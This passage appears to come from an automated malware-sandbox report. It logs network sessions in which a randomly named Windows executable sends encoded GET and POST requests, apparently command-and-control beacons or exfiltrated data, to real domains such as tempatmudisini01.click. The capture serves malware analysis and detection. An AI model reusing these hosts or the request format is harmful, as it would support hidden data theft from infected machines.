                                                      Data Ascii: e36Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskkn[Tcxn:EF){Ja8Q[@m|Ei!fwhgrI*apc-[fH.#bc{+Gc/7Yu+$L`qh(Rs6TjU!;2(a2C63EH#eTo -gnCJ-2_+,1t'ZnuxTPZi9UGOaq6v5<?""u_{x'~,o;x/M>Hn.~Uo/ypRCjm(g-g3x||-*e%n}7LOn-[XG>jRg79bT-|x#9603t~D31Jw(dxXL?a>g)="3cJH?miEZ@lTy\i{0Pv:T%hZNh=eKX|I+Q`F&s(K&)./|:uS[(d-Z5`3d/QI5B0kx7G^IrS38Zp(978@uS(4B& a27$+8Ib2NaQ [TRUNCATED]
                                                      Sep 19, 2024 15:06:12.589293003 CEST1236INData Raw: 74 e0 41 a3 ef 69 fb 74 d6 89 f9 0b 4c eb 1a 03 78 b5 e3 b5 5c b5 11 19 da c3 31 61 14 f8 5e f7 e9 46 01 2d 03 ee 36 45 b5 7f 01 bd 08 61 50 ef e3 f8 1e 70 c6 23 4c b1 ed ac ff 6a e5 84 a3 b6 36 79 2e 49 db 07 ef 0d 10 34 3d 85 71 ff 8c 50 78 3f
                                                      Data Ascii: tAitLx\1a^F-6EaPp#Lj6y.I4=qPx?.8<N{7\L*[Fy[`%Qt7Y]F>p`G5.0MN[mr'H?_V!3xHC|G'ZLtCrfzqJw'+@],Hn
                                                      Sep 19, 2024 15:06:12.589303970 CEST1236INData Raw: ba bc 8b a7 b2 4a 64 c1 ff 24 fa 64 d6 03 79 e9 b0 2c f2 f4 34 c5 18 27 e3 8b 11 99 6d d0 39 ad 05 fd 51 94 a7 bc a0 98 d8 22 91 e6 2c 81 33 e5 c2 b9 05 9a 23 4d 06 ab 3f 02 93 7e ca d1 1f 1b 5e 46 3b e4 39 2a e2 6f b8 1b 50 ad 53 0f 90 78 0d 9b
                                                      Data Ascii: Jd$dy,4'm9Q",3#M?~^F;9*oPSx|MU8 ~z(/#}JTs8Ld9<rP3=X{M<Dgnt*=JO\AF|KpynxK//M#lr+qOnD9o
                                                      Sep 19, 2024 15:06:12.589315891 CEST116INData Raw: c6 97 e8 bd dc ab b0 90 ad 0a b5 38 72 d8 74 42 3f e0 22 1e f7 7a d1 c8 9e 9f 45 31 ce a6 9d 41 57 bf 6d 9b bb 92 2d 0a 61 56 26 2f 5e c1 d1 21 37 9e 05 fa 70 2c 3c f4 39 2b db a1 ef 8e 22 b5 22 e8 aa e4 ac 71 06 3f c3 2b 2b 25 21 5d 3c 94 22 47
                                                      Data Ascii: 8rtB?"zE1AWm-aV&/^!7p,<9+""q?++%!]<"G)dRu,GO/x)0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      25192.168.2.2249186194.58.112.174802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:14.433381081 CEST480OUTGET /vyk8/?00yp=/8W9lHmy/meYp2fNs2vUBdBvO0RaxjuKL4zSfhQhCqnq6Zc+yf7IonRJTCfzY86I2zYWDYBqoARqKVl9Xke+POkkhC0Ee73KmYZXYdkjDu+t7uIGKB6Jrfbo3k9d&8Xv=VLHph HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Host: www.albero-dveri.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Sep 19, 2024 15:06:15.121890068 CEST1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Thu, 19 Sep 2024 13:06:15 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                                      Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.albero-dveri.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                                      Sep 19, 2024 15:06:15.121917009 CEST224INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                                                      Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.albero-dveri.online</h
                                                      Sep 19, 2024 15:06:15.121927023 CEST1236INData Raw: 31 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1
                                                      Data Ascii: 1><p class="b-parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_s
                                                      Sep 19, 2024 15:06:15.121938944 CEST1236INData Raw: 6d 61 67 65 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 2d 69 6d 61 67 65 5f 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e
                                                      Data Ascii: mage b-parking__promo-image_type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nb
                                                      Sep 19, 2024 15:06:15.121951103 CEST1236INData Raw: 69 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 67 2e 72 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69
                                                      Data Ascii: ing" href="https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amo
                                                      Sep 19, 2024 15:06:15.122006893 CEST1236INData Raw: 6d 70 61 63 74 22 3e d0 93 d0 be d1 82 d0 be d0 b2 d1 8b d0 b5 20 d1 80 d0 b5 d1 88 d0 b5 d0 bd d0 b8 d1 8f 20 d0 bd d0 b0 26 6e 62 73 70 3b 43 4d 53 3c 2f 73 74 72 6f 6e 67 3e 3c 70 20 63 6c 61 73 73 3d 22 62 2d 74 65 78 74 20 62 2d 70 61 72 6b
                                                      Data Ascii: mpact"> &nbsp;CMS</strong><p class="b-text b-parking__promo-description"> &nbsp;CMS &nbsp; &nb
                                                      Sep 19, 2024 15:06:15.122019053 CEST1236INData Raw: 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 62 75 69 6c 64 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63
                                                      Data Ascii: www.albero-dveri.online&utm_medium=parking&utm_campaign=s_land_build&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__ssl-protection"><span class="b-parking__promo-image b-parking__promo-image
                                                      Sep 19, 2024 15:06:15.122029066 CEST1236INData Raw: bb d0 b5 d0 b9 20 d0 b8 26 6e 62 73 70 3b d0 ba d0 bb d0 b8 d0 b5 d0 bd d1 82 d0 be d0 b2 20 d0 b8 26 6e 62 73 70 3b d1 83 d0 bb d1 83 d1 87 d1 88 d0 b8 d1 82 d0 b5 20 d0 b5 d0 b3 d0 be 20 53 45 4f 2d d0 bf d0 be d0 ba d0 b0 d0 b7 d0 b0 d1 82 d0
                                                      Data Ascii: &nbsp; &nbsp; SEO-.</p></div></div></article><script onload="window.trackScriptLoad('parking-rdap-auto.js')" onerror="window.trackScriptLoad('parking-rdap-auto.js', 1)" src="
                                                      Sep 19, 2024 15:06:15.122040987 CEST1236INData Raw: 63 72 69 70 74 20 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 69 66 20 28 20 27 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 27 2e 6d 61 74 63 68 28 20 2f 78 6e 2d 2d 2f 20 29 20 26 26 20 64 6f 63 75 6d 65 6e
                                                      Data Ascii: cript );</script><script>if ( 'www.albero-dveri.online'.match( /xn--/ ) && document.querySelectorAll ) { var spans = document.querySelectorAll( 'span.puny, span.no-puny' ), t = 'textContent' in document.body ? 'textContent'
                                                      Sep 19, 2024 15:06:15.122052908 CEST685INData Raw: 38 30 39 30 39 2d 32 35 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 59 61 6e 64 65 78 2e 4d 65 74 72 69 6b 61 20 63 6f 75 6e 74 65 72 20 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e
                                                      Data Ascii: 80909-25');</script>... Yandex.Metrika counter --><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)}; m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      26192.168.2.2249187103.21.221.4802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:20.173080921 CEST2472OUTPOST /lybf/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.tempatmudisini01.click
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 2161
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/lybf/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 56 31 51 55 46 6c 66 35 51 4b 35 71 61 68 74 35 6f 2b 30 31 6f 55 31 43 38 5a 56 72 2f 58 59 6c 6b 44 37 4c 53 76 6c 46 6c 6a 6c 56 65 75 31 74 57 31 68 70 74 42 61 6f 57 64 36 38 64 46 46 4e 50 4b 46 63 4f 78 75 58 70 59 53 6e 4b 61 31 6f 41 2f 64 71 58 65 4b 57 4f 68 2b 57 4b 4e 4b 49 47 4e 63 54 71 4b 4d 55 42 6a 51 41 70 65 62 71 6d 54 74 41 72 71 72 6c 6f 53 6e 49 41 6f 79 47 35 7a 6d 32 44 4e 47 4b 62 33 32 79 37 41 42 62 6f 53 73 7a 56 45 78 69 75 6e 41 31 59 61 39 47 45 73 68 2f 41 6b 47 34 62 78 78 49 33 56 47 2b 35 31 2f 4e 42 32 54 30 43 69 6c 71 50 32 4d 77 44 4d 71 42 2f 2f 62 64 4d 71 32 4b 47 54 64 72 4c 75 37 7a 4e 42 33 73 56 32 2f 39 42 6f 63 58 71 34 57 4a 30 47 75 4c 36 59 6e 44 33 46 6a 42 78 79 2f 30 4e 32 57 34 78 38 73 7a 34 57 4e 4c 36 39 39 44 49 56 69 65 56 2b 2b 34 48 75 64 58 52 6a 2f 72 62 31 55 4b 32 6b 67 4f 51 79 45 54 4d 4b 59 4c 78 63 50 44 58 73 39 52 6f 2f 63 50 69 62 57 49 6c 68 49 2f 72 48 68 38 4f 65 51 57 6b 56 67 51 43 46 6a 7a 30 31 4a 5a 77 [TRUNCATED]
                                                      Data Ascii: 00yp=V1QUFlf5QK5qaht5o+01oU1C8ZVr/XYlkD7LSvlFljlVeu1tW1hptBaoWd68dFFNPKFcOxuXpYSnKa1oA/dqXeKWOh+WKNKIGNcTqKMUBjQApebqmTtArqrloSnIAoyG5zm2DNGKb32y7ABboSszVExiunA1Ya9GEsh/AkG4bxxI3VG+51/NB2T0CilqP2MwDMqB//bdMq2KGTdrLu7zNB3sV2/9BocXq4WJ0GuL6YnD3FjBxy/0N2W4x8sz4WNL699DIVieV++4HudXRj/rb1UK2kgOQyETMKYLxcPDXs9Ro/cPibWIlhI/rHh8OeQWkVgQCFjz01JZw1fzvDHxVHm/mphin4ydxSWTxNVPlirPlIcp0R8GGGU9wKVIuO6RVg6et+8t9WUaal4JuZV9j6cKc0LEuGnf684HeL/ySw7qOzVnm2sXxva7E/KQQXQNEBcH0uQZSz2d3Ep32ExlvRQ2PGt4Wr2IzxpAsq+xVcshPmM140vxpVqm2N4xDFj+LcGmG1FD2yTt6yXUN0gTDZJpQeGj5KgCEdZWl+mO5ilEGt5rLxEglc0XbegRon1kycJSLSol1N53XqZou0mmq6x+1xHzTKbq0qUDp6T/ZehSG7rWlA19n+jeec2de76Q3iSk13zgOiaPi8olGEGp6cZAs4nsp59wGZG2QsjV1AyhMoFZLLDIxbMDPH2ahaGxHROzrQGpayzXgdxR6JOTyKleX1ZVvbp5Ni8l/sNnMSuWLPSBZb6qIJ+PDv9irZj6IZE3JF02AOqgvzgNODe3Z56fQQU6RaCc4mSKH5Z4qyAeQ2NPULx2mmSrgo36mH4iVwCh2EeP5fzFou4zDpgQsoMQL3I8kWkVTzesRsmKHUaOdhrXBtK0c+KkQvdzQtiDoYu+QL4RBjLp+qPOxln/zE1zsQDyip8aeLga9p31Gfbbk0WZJUoyX14GZAWF46S+ClCLMZPlmRKYMWp3oRUxYOyQBtTo1iBLDWyTPblEhmVZ5EO [TRUNCATED]
                                                      Sep 19, 2024 15:06:20.178008080 CEST258OUTData Raw: 61 72 69 56 6c 54 69 74 31 33 57 71 48 55 74 35 38 78 6b 6a 54 67 55 7a 33 63 68 4d 30 4e 79 31 6c 32 76 4c 35 69 5a 4b 63 77 79 49 58 58 37 46 4f 59 64 44 6e 44 45 38 30 5a 4c 4c 36 47 43 59 6e 44 41 4e 55 53 56 57 43 63 43 4c 39 36 64 63 52 76
                                                      Data Ascii: ariVlTit13WqHUt58xkjTgUz3chM0Ny1l2vL5iZKcwyIXX7FOYdDnDE80ZLL6GCYnDANUSVWCcCL96dcRvX09O1hXn4Eo1NKBttVpOvZ2OnpxFumk4Tnr/cMaqrFw8Va42FH6/7Si9qOi+Gwr5jicLBRvsd4tnoEziTEoSbqnTlIap/uNbZKofDTMvcNXHdnNY1FetiLdXreM6+YGcrHwRorBzOCA/Bvry5cVEuJkPALjD2m5Jz
                                                      Sep 19, 2024 15:06:21.638793945 CEST1236INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/7.4.33
                                                      x-litespeed-tag: 894_HTTP.404
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      content-type: text/html; charset=UTF-8
                                                      link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                      x-litespeed-cache-control: no-cache
                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                      transfer-encoding: chunked
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Thu, 19 Sep 2024 13:06:21 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                                      Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                                      Sep 19, 2024 15:06:21.638813019 CEST1236INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                                      Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S
                                                      Sep 19, 2024 15:06:21.638823986 CEST1236INData Raw: 03 67 54 c8 60 cc c5 34 3d ae f6 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c
                                                      Data Ascii: gT`4=!p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~
                                                      Sep 19, 2024 15:06:21.638837099 CEST1236INData Raw: 25 57 2f b3 9a fc 88 a2 2b 8a 8e 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf
                                                      Data Ascii: %W/+i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/g
                                                      Sep 19, 2024 15:06:21.638848066 CEST1236INData Raw: 53 0c 9e 26 9c 45 5c ea 34 3d 94 0d 24 52 8b 33 49 30 99 64 36 0e 4c 0e a2 e0 22 01 25 93 0d 03 e3 fe 79 ec ca c5 f1 61 75 88 ba 67 b9 a6 cc 4c 96 83 f3 83 cd c2 bc f8 b0 f9 b5 9b e2 6a 73 e8 f6 0b ae 27 fd bb 82 5c 7d 4a 8e 13 97 2d ec 17 cd 7f
                                                      Data Ascii: S&E\4=$R3I0d6L"%yaugLjs'\}J-D\n4Moz^Dm]jaG!c,F!4y;&<+D\@[0W0*-Kdo\O@5xN=0E!Ws;LpD}M]hP2{=$
                                                      Sep 19, 2024 15:06:21.638873100 CEST1236INData Raw: c1 f7 1b 30 e0 a5 c8 61 26 f0 02 bc ac 4c 45 28 60 59 eb 1c 66 7a 63 cf 18 20 90 0a 6d 7e 79 00 61 c9 6b 49 28 88 f2 8d 9b 30 90 0c 6c 83 ff 2c b1 5e b2 14 d5 3b ba da 3e 3c c6 da e4 ef 16 be f9 dd b2 87 fc 0d 85 0d 66 5a 07 14 ab b9 ed 6e 0b 9f
                                                      Data Ascii: 0a&LE(`Yfzc m~yakI(0l,^;><fZn]Zos:Q4O{wNN%fX2R0]3+_;"wuOue7S'4suviR~2/9E!"KuKz
                                                      Sep 19, 2024 15:06:21.638886929 CEST1236INData Raw: e7 95 9f dc 46 80 17 3e 0b 9e 21 17 2d ab b7 29 6a 19 97 ac 69 b0 3a ab 2c cd 36 53 64 c7 35 0f e7 ab 1a 89 01 c7 1a 08 ac 5a 36 85 d9 25 53 b1 2a b0 ca 5a 59 51 f8 ce e0 95 ca 04 c9 cc f3 84 89 76 cb 2d 65 e0 de 6b 37 81 f3 ef 6f 99 49 6c 12 c1
                                                      Data Ascii: F>!-)ji:,6Sd5Z6%S*ZYQv-ek7oIlA$pr@u{|Brf:=->&s:9bjT'@.0G41Q/hT'GGa+Hjo0c;5aI('S M1|$SgCUz^CX
                                                      Sep 19, 2024 15:06:21.638900042 CEST1236INData Raw: 98 a7 34 c4 25 1d bb 7b d9 3f 01 15 9d 4e e3 a5 31 55 87 96 16 b1 9e dd 32 4c ba 10 ed 49 d4 ae e0 bc f1 8e a3 f0 bf ff 5d 73 e8 e3 29 73 6d f5 34 e3 87 23 e4 fb ee dc ba ad 2e 23 c2 ce 1c f2 c4 b6 8b ed 00 b4 a4 3d dc 55 b1 12 15 49 b0 b7 61 af
                                                      Data Ascii: 4%{?N1U2LI]s)sm4#.#=UIaP\[X=AbN'i&]D(A~fQx!CP}dBA{:%Q7<ar?EUKvXOz'}`xtaB,Ry*/;rnO<6H[_}M;}
                                                      Sep 19, 2024 15:06:21.638911963 CEST1224INData Raw: 0b 6e cf 64 17 4d a2 09 49 0d d2 87 ad d4 92 8a e5 9b 7c 5a 8b a1 d8 c3 68 80 8e f5 a2 22 17 a4 65 5b 85 58 2e f7 24 9a bc f9 f5 b6 b6 45 66 12 fd a3 3c 13 df bf 50 33 d4 38 7f b7 19 22 13 73 8d 15 ae e4 48 ab 76 76 89 0e 45 55 d3 19 f7 cc f0 a8
                                                      Data Ascii: ndMI|Zh"e[X.$Ef<P38"sHvvEUZR!r,+DC(9(53likXr6`i&v3[R@J7sSTs(P)n!M&`AX,ACcEj 4kvl$Nk.vC,VByLfjh/xMIX$%IJ
                                                      Sep 19, 2024 15:06:21.638925076 CEST929INData Raw: c0 64 2b 9e d6 ed 2d e8 4c f7 1b 9b 3d 34 2c 63 e8 26 8a 6d 91 d6 60 aa e6 39 ff ae 91 c5 aa 98 81 e1 17 91 36 14 79 6e e5 a9 f5 1a 5a 32 5c 5a 5c 2c f6 c9 df 94 66 18 07 34 03 d1 39 a2 10 f4 69 73 f4 24 94 36 9e 71 11 19 26 15 bf 39 1e 97 69 19
                                                      Data Ascii: d+-L=4,c&m`96ynZ2\Z\,f49is$6q&9i_y/bgi]h/8G''qPjO@88'Q1)nC+5BZ)w}Gz`Kl!U&<*p!zLU-n956@F&2^^=t


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      27192.168.2.2249188103.21.221.4802128C:\Program Files (x86)\louydkvilTWUNUzzUuqUIkoQxLGVuZPrLauJBHFhFK\dGGVPduKBhByY.exe
                                                      TimestampBytes transferredDirectionData
                                                      Sep 19, 2024 15:06:22.741157055 CEST769OUTPOST /lybf/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Accept-Encoding: gzip, deflate, br
                                                      Host: www.tempatmudisini01.click
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 201
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      Origin: http://www.tempatmudisini01.click
                                                      Referer: http://www.tempatmudisini01.click/lybf/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 30 30 79 70 3d 56 31 51 55 46 6c 66 35 51 4b 35 71 61 69 46 35 6e 4b 41 31 6f 30 31 43 39 5a 56 72 6f 48 59 6a 6b 44 2b 32 53 72 31 76 6c 51 46 56 64 2f 46 74 57 48 35 70 71 42 61 70 65 39 36 34 54 6c 46 69 50 4b 46 2b 4f 77 43 58 70 59 32 6e 4b 35 4e 6f 47 37 4a 70 4b 65 4b 59 44 42 2b 58 4b 4e 32 46 47 4e 51 44 71 4b 6b 55 42 6c 77 41 6f 65 72 71 6a 31 5a 41 75 61 72 6a 35 79 6e 62 41 6f 2b 58 35 7a 32 75 44 4e 71 4b 62 6d 71 79 37 52 68 62 69 6c 34 7a 63 6b 78 6e 6a 48 41 72 52 66 67 70 63 73 4a 71 46 32 65 72 5a 51 4e 2f 36 55 53 2b 33 46 33 59 43 32 62 65 4d 69 30 74 4e 48 52 31 57 67 3d 3d
                                                      Data Ascii: 00yp=V1QUFlf5QK5qaiF5nKA1o01C9ZVroHYjkD+2Sr1vlQFVd/FtWH5pqBape964TlFiPKF+OwCXpY2nK5NoG7JpKeKYDB+XKN2FGNQDqKkUBlwAoerqj1ZAuarj5ynbAo+X5z2uDNqKbmqy7Rhbil4zckxnjHArRfgpcsJqF2erZQN/6US+3F3YC2beMi0tNHR1Wg==
                                                      Sep 19, 2024 15:06:23.979036093 CEST1236INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/7.4.33
                                                      x-litespeed-tag: 894_HTTP.404
                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      content-type: text/html; charset=UTF-8
                                                      link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                                      x-litespeed-cache-control: no-cache
